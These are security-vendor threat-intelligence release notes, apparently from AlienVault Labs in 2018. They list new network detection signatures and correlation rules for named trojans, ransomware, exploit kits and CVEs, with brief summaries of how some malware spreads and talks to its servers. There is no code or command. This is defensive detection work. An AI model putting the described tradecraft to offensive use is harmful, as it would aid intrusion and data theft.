    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Win32/Agent.ZJL, Win32/Agent.XXYIUO, W32.Bloat-A, Win32.Unwaders.C, Win32/ZeroEvil, RektBot, MSIL/Acrux Miner Stealer, Win32/PSW.Agent.OFE, Win32/PlugF, Win32/ShamSalt, and Win32.ActiveAgent.

    • System Compromise, Malware Infection, Trojan

    New Detection Techniques

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including MageCart Exfil, Agent Tesla, STOP Ransomware, JadidBot CnC, Fbot/Satori, Xbash, NUUO NVR Peekaboo Vulnerability Check Inbound, NUUO NVRMini2 3.8 RCE Inbound, and Apache Pluto RCE (CVE-2018-1306):

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Ransomware
    • System Compromise, Malware, Suspicious SSL Certificate
    • Exploitation & Installation, Exploit, Vulnerability Scanner
    • Exploitation & Installation, Exploit, Code Execution

    Updated Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including MalDoc, W32/Kutaki, Win32.DanaBot, Zebrocy, MinerLoader, and Win32/ZeroEvil:

    • System Compromise, Malware, Trojan

    Updated Detection Techniques - Mobile Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including Asacub.a Banker, SmsSpy, and Trojan.AndroidOS.Boogr.gsh.

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Dropper
    • System Compromise, Malware, APT

    Updated Detection Technique – C&C Communication

    For USM Anywhere, we've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:

    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Correlation Rules

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to additional recent malicious activity, including phishing activity, Ramnit, Phorpiex, Tofsee, CoinMiner, and Fallout EK:

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Worm
    • System Compromise, Suspicious Activity, Suspicious User-Agent
    • System Compromise, Suspicious Activity, Exploit Kit - Landing
    • Delivery & Attack, Suspicious Activity, Phishing
  • AlienVault Labs Threat Intelligence Update for USM Appliance: September 2 – September 8, 2018

    New Detection Techniques - GhostScript exploits

    GhostScript is a PostScript language interpreter. Its main purpose is to render a webpage page's description language in order to display or print document pages.

    Ghostscript contains an optional -dSAFER option, which is supposed to prevent unsafe PostScript operations. However, multiple PostScript operations bypass the protections provided by -dSAFER, which allows an attacker to execute arbitrary commands with arbitrary arguments. This vulnerability can also be exploited in applications that leverage GhostScript, such as ImageMagick, GraphicsMagick, evince, Okular, Nautilus, and others.

    We've added NIDS signatures and the following correlation rule to detect GhostScript exploit activity: 

    • Delivery & Attack, Vulnerable Software Exploitation, Code Execution

    New Detection Techniques - DanaBot

    DanaBot, a banking trojan targeting Australian users, first surfaced in May 2018. The malware is mainly distributed through phishing emails, which include a macro-enabled Word document. Once macros are allowed to run, the malicious macro will download DanaBot using a PowerShell command.

    The main DanaBot payload includes web injection and downloader features. Network communication to the C&C server is made via encrypted TCP traffic to port 443. The cypher used for network communications is AES256, using Microsoft's crypto API.

    We've added NIDS signatures and the following correlation rule to detect DanaBot activity: 

    • System Compromise, Malware Infection, Trojan

    New Detection Techniques - Exploits

    We've added the following correlation rules as a result of additional recent malicious activity:

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, ASUS DSL RCE (CVE-2018-15887)
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Apache Struts memberAccess and getWriter inbound OGNL injection remote code execution

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, EmeraldRabbit
    • System Compromise, Trojan infection, Generic Obfuscated Batch
    • System Compromise, Trojan infection, JavaScript Downloader
    • System Compromise, Trojan infection, MR.Dropper.KR
    • System Compromise, Trojan infection, Urelas
    • System Compromise, Trojan infection, W32.FakeEzQ.kr
    • System Compromise, Trojan infection, W32.Mandaph.Coinminer
    • System Compromise, Trojan infection, Win32/Occamy.C
    • System Compromise, Trojan infection, Win32/Presenoker
    • System Compromise, Ransomware infection, Shrug2
    • System Compromise, Ransomware infection, Thanatos Ransomware
    • System Compromise, Ransomware infection, Win32/Aura Ransomware

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, C&C Communication, Bancos Variant Downloader SSL Certificate
    • System Compromise, C&C Communication, MagentoCore
    • System Compromise, C&C Communication, Malicious SSL Cert (CobInt Downloader)
    • System Compromise, Malicious website - Exploit Kit, GreenFlash Sundown EK
    • System Compromise, Malware infection, CeidPageLock

    Updated Detection Techniques - Oilrig's OopsIE

    Oilrig, the Iran-linked APT group, is using a variant of the data-exfiltration OopsIE trojan to attack government entities in the Middle East. The group was identified in 2015 and is believed to be linked with the Iranian Intelligence agency and the Islamic Revolutionary Guard Corps (IRGC). They’re known for attacking energy, financial, aviation, infrastructure, government and university organizations, primarily in the Middle East.

    The OopsIE trojan is delivered via spear phishing emails which attach a Word document with malicious macros. The malicious macros leverage certutil for base64 decoding the payload and scheduled tasks to execute malicious payloads with a certain delay. The trojan is capable of:

    • Running commands on the target machine remotely
    • Downloading files from C&C
    • Uploading files to C&C

    It is notable that the OopsIE trojan uses the InternetExplorer application object for it's network communications, which are made using GZIP-encoded HTTP requests.

    We've added NIDS signatures and the following correlation rule to detect the exploit's activity: 

    • System Compromise, Trojan infection, Oilrig Stealer

    Updated Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, AgentTesla
    • System Compromise, Trojan infection, Generic PowerShell
    • System Compromise, Trojan infection, Helminth
    • System Compromise, Trojan infection, MSIL/Eredel Stealer
    • System Compromise, Trojan infection, Neshta
    • System Compromise, Trojan infection, Unknown PowerShell
    • System Compromise, Trojan infection, Ursniff
    • System Compromise, Trojan infection, Win32.DanaBot

    Updated Detection Technique – Malware SSL Certificates

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

    • System Compromise, C&C Communication, Cobalt Group SSL
    • System Compromise, C&C Communication, Known malicious SSL certificate
    • System Compromise, C&C Communication, Ursnif SSL activity

    Updated Correlation Rules

    We've added NIDS signatures and updated the following correlation rules as a result of additional recent malicious activity:

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Ghostscript invalidcheck escape attempt
    • Exploitation & Installation, Malicious website - Exploit Kit, Magnitude EK
    • System Compromise, Malicious website - Exploit Kit, GreenFlash Sundown EK
    • System Compromise, Malware RAT, Remcos/Remvio
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Mobile trojan infection, Asacub.a Banker
    • System Compromise, Mobile trojan infection, SmsSpy
    • System Compromise, Mobile trojan infection, Trojan.AndroidOS.Boogr.gsh
    • System Compromise, Targeted Malware, APT32
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: September 2 – September 8, 2018

    New Detection Techniques - GhostScript exploits

    GhostScript is a PostScript language interpreter. Its main purpose is to render a webpage page's description language in order to display or print document pages.

    Ghostscript contains an optional -dSAFER option, which is supposed to prevent unsafe PostScript operations. However, multiple PostScript operations bypass the protections provided by -dSAFER, which allows an attacker to execute arbitrary commands with arbitrary arguments. This vulnerability can also be exploited in applications that leverage GhostScript, such as ImageMagick, GraphicsMagick, evince, Okular, Nautilus, and others.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect GhostScript exploit activity:

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Ghostscript illegal delete bindnow attempt
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Ghostscript illegal read undefinedfilename attempt
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Ghostscript invalidcheck escape attempt
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Ghostscript type confusion attempt

    New Detection Techniques - DanaBot

    DanaBot, a banking trojan targeting Australian users, first surfaced in May 2018. The malware is mainly distributed through phishing emails, which include a macro-enabled Word document. Once macros are allowed to run, the malicious macro will download DanaBot using a PowerShell command.

    The main DanaBot payload includes web injection and downloader features. Network communication to the C&C server is made via encrypted TCP traffic to port 443. The cypher used for network communications is AES256, using Microsoft's crypto API.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect DanaBot activity:

    • System Compromise, Trojan infection, Win32/DanaBot

    New Detection Techniques - Exploits

    For USM Anywhere, we've updated the following correlation rule as a result of additional recent malicious activity:

    • Delivery & Attack, Vulnerable Software Exploitation, Code Execution

    New Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including EmeraldRabbit, Urelas, W32.FakeEzQ.kr, W32.Mandaph.Coinminer, Win32/Occamy.C, Win32/Presenoker, Shrug2, Thanatos Ransomware, and Aura Ransomware:

    • System Compromise, Malware Infection, Downloader
    • System Compromise, Malware Infection, Potentially Unwanted Program
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Ransomware

    New Detection Techniques

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including MagentoCore, Bancos Variant Downloader SSL Certificate, CobInt Downloader, GreenFlash Sundown EK, and CeidPageLock: 

    • Delivery & Attack, Malware Infection, Suspicious SSL Certificate
    • Delivery & Attack, Malware Infection, Exploit Kit - Landing
    • System Compromise, Malware Infection, Trojan

    Updated Detection Techniques - Oilrig's OopsIE

    Oilrig, the Iran-linked APT group, is using a variant of the data-exfiltration OopsIE trojan to attack government entities in the Middle East. The group was identified in 2015 and is believed to be linked with the Iranian Intelligence agency and the Islamic Revolutionary Guard Corps (IRGC). They’re known for attacking energy, financial, aviation, infrastructure, government and university organizations, primarily in the Middle East.

    The OopsIE trojan is delivered via spear phishing emails which attach a Word document with malicious macros. The malicious macros leverage certutil for base64 decoding the payload and scheduled tasks to execute malicious payloads with a certain delay. The trojan is capable of:

    • Running commands on the target machine remotely
    • Downloading files from C&C
    • Uploading files to C&C

    It is notable that the OopsIE trojan uses the InternetExplorer application object for it's network communications, which are made using GZIP-encoded HTTP requests.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect OopsIE:

    • System Compromise, Malware Infection, APT

    Updated Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect additional recent malicious activity, including AgentTesla, Helminth, MSIL/Eredel Stealer, Neshta, Ursniff, and Win32.DanaBot.

    • System Compromise, Malware Infection, Generic
    • System Compromise, Malware Infection, Spyware
    • System Compromise, Malware Infection, Trojan

    Updated Detection Technique – Malware SSL Certificates

    For USM Anywhere, we've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:

    • System Compromise, Malware Infection, Malicious SSL Certificate

    Updated Correlation Rules

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to additional recent malicious activity:

    • Delivery & Attack, Vulnerable Software Exploitation, Code Execution
    • Delivery & Attack, Malware Infection, Exploit Kit - Landing
    • System Compromise, Exploit, Code Execution
    • System Compromise, Malware Infection, Malicious Stratum Authline
    • System Compromise, Malware Infection, Remote Access Trojan
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Spyware
    • System Compromise, Malware Infection, APT
  • AlienVault Labs Threat Intelligence Update for USM Appliance: August 12 – August 18, 2018

    New Detection Techniques - Marap

    Marap is a multi-functional malware that recently starred in an agressive spear-phishing campaign targeting financial entities. Marap is very flexible and can extend its capabilities by downloading additional modules. It can change its installed exploits or payloads, allowing it to act as a downloader for many different strains of malware. It also contains reconnaissance modules that collect data from the target system, such as username, domain name, hostname, IP, language, country, OS version, MS Outlook .ost files names, and anti-virus software installed.

    It includes anti-analysis features, such as string obfuscation and sandbox detection. It also makes use of a encrypted configuration file, called 'sign.bin', which contains the necessary parameters to perform the C&C. This traffic goes over simple HTTP with the ability to configure a proxy to avoid direct communication with the server.

    We've added NIDS signatures and the following correlation rule to detect Marap activity: 

    • System Compromise, Malware Infection, Trojan

    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5b7611e862be317557a98d43

    New Detection Techniques - MAFIA Ransom

    MAFIA ransomware recently emerged in the wild targeting users in Korea. It gets its name from the extension it applies to its victims' files. It uses OpenSSL to perform the file encryption, which is carried out using AES-256-CBC. It encrypts all files with extensions included in a list of 300+ different extensions. For the C&C, it uses a Tor proxy at onion[.]pet.

    After encryption, the malware attempts to send out the encryption key and initilization vector to the C&C sever using a HTTP GET request. It also creates a file named 'Information' that contains some korean text and two strings to be used as identifiers for the ransom payment and decryption processes.

    We've added NIDS signatures and the following correlation rule to detect MAFIA activity: 

    • System Compromise, Malware Infection, Ransomware

    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5b70534f319dba7ddcdaab8f

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, JEUSD
    • System Compromise, Trojan infection, MSIL/Haunted Miner
    • System Compromise, Trojan infection, MSIL/Simple Miner
    • System Compromise, Trojan infection, MSIL/Songhan
    • System Compromise, Trojan infection, Win32/Donloz

    Added Detection Technique – Malware SSL Certificates

    We've added new IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

    • System Compromise, C&C Communication, Haunted Miner Malicious SSL Cert
    • System Compromise, C&C Communication, JEUSD SSL
    • System Compromise, C&C Communication, PoshAdvisor SSL/TLS

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Adobe Reader Untrusted Pointer Dereference (CVE-2018-12799)
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Advantech Login SQL Injection Attempt (CVE-2017-16716)
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Flash Player Out-of-bounds Read
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Windows Remote Assistance XXE Exploit Inbound (CVE-2018-0878)
    • System Compromise, Mobile trojan infection, Android.Trojan.InfoStealer.MT

    Updated Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, Arkei Stealer
    • System Compromise, Trojan infection, Bancos Variant.DZO
    • System Compromise, Trojan infection, DDoS Smoke Loader
    • System Compromise, Trojan infection, Dupzom
    • System Compromise, Trojan infection, MICROPSIA
    • System Compromise, Trojan infection, Pegasus

    Updated Detection Technique – Malware SSL Certificates

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

    • System Compromise, C&C Communication, Cobalt Group SSL
    • System Compromise, C&C Communication, CobaltStrike SSL activity
    • System Compromise, C&C Communication, Observed Malicious SSL Cert (MalDoc DL) SSL activity

    Updated Correlation Rules

    We've added NIDS signatures and updated the following correlation rules as a result of additional recent malicious activity:

    • Delivery & Attack, Malicious website, Phishing activity
    • Exploitation & Installation, Malicious website - Exploit Kit, KaiXin
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Mobile trojan infection, Hqwar Dropper
    • System Compromise, Suspicious Behaviour, Suspicious user-agent detected
    • System Compromise, WebServer Attack, JS/BrushaLoader CnC